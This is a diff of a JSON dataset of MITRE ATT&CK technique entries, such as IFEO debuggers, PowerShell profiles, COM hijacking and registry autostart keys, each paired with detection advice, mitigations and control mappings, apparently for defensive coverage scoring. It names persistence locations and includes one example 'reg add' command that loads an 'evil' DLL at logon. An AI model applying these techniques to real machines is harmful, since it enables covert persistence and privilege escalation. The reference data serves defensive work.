+        "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g  notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)",
+        "url": "https://attack.mitre.org/techniques/T1546/012",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.12380952380952381,
+        "adjusted_score": 0.12380952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.013",
+        "name": "Event Triggered Execution: PowerShell Profile",
+        "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)",
+        "url": "https://attack.mitre.org/techniques/T1546/013",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            }
+        ],
+        "cumulative_score": 0.29047619047619044,
+        "adjusted_score": 0.29047619047619044,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-10",
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.014",
+        "name": "Event Triggered Execution: Emond",
+        "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.",
+        "url": "https://attack.mitre.org/techniques/T1546/014",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            }
+        ],
+        "cumulative_score": 0.22857142857142856,
+        "adjusted_score": 0.22857142857142856,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-5",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.015",
+        "name": "Event Triggered Execution: Component Object Model Hijacking",
+        "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ",
+        "url": "https://attack.mitre.org/techniques/T1546/015",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.17142857142857143,
+        "adjusted_score": 0.17142857142857143,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1547",
+        "name": "Boot or Logon Autostart Execution",
+        "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.",
+        "url": "https://attack.mitre.org/techniques/T1547",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Driver: Driver Load",
+            "File: File Creation",
+            "File: File Modification",
+            "Kernel: Kernel Module Load",
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1547.001",
+                "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
+                "url": "https://attack.mitre.org/techniques/T1547/001",
+                "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
+                "detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1547.002",
+                "name": "Boot or Logon Autostart Execution: Authentication Package",
+                "url": "https://attack.mitre.org/techniques/T1547/002",
+                "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.",
+                "detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
+                "mitigations": [
+                    {
+                        "mid": "M1025",
+                        "name": "Privileged Process Integrity",
+                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                        "url": "https://attack.mitre.org/mitigations/M1025"
                     }
                 ]
             },
             {
-                "tid": "T1059.002",
-                "name": "Command and Scripting Interpreter: AppleScript",
-                "url": "https://attack.mitre.org/techniques/T1059/002",
-                "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)",
-                "detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+                "tid": "T1547.003",
+                "name": "Boot or Logon Autostart Execution: Time Providers",
+                "url": "https://attack.mitre.org/techniques/T1547/003",
+                "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)",
+                "detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
                 "mitigations": [
                     {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
                     }
                 ]
             },
             {
-                "tid": "T1059.003",
-                "name": "Command and Scripting Interpreter: Windows Command Shell",
-                "url": "https://attack.mitre.org/techniques/T1059/003",
-                "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.",
-                "detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+                "tid": "T1547.004",
+                "name": "Boot or Logon Autostart Execution: Winlogon Helper DLL",
+                "url": "https://attack.mitre.org/techniques/T1547/004",
+                "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
+                "detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
                 "mitigations": [
                     {
                         "mid": "M1038",
                         "name": "Execution Prevention",
                         "description": "Block execution of code on a system through application control, and/or script blocking.",
                         "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1059.004",
-                "name": "Command and Scripting Interpreter: Unix Shell",
-                "url": "https://attack.mitre.org/techniques/T1059/004",
-                "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
-                "detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
+                "tid": "T1547.005",
+                "name": "Boot or Logon Autostart Execution: Security Support Provider",
+                "url": "https://attack.mitre.org/techniques/T1547/005",
+                "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)",
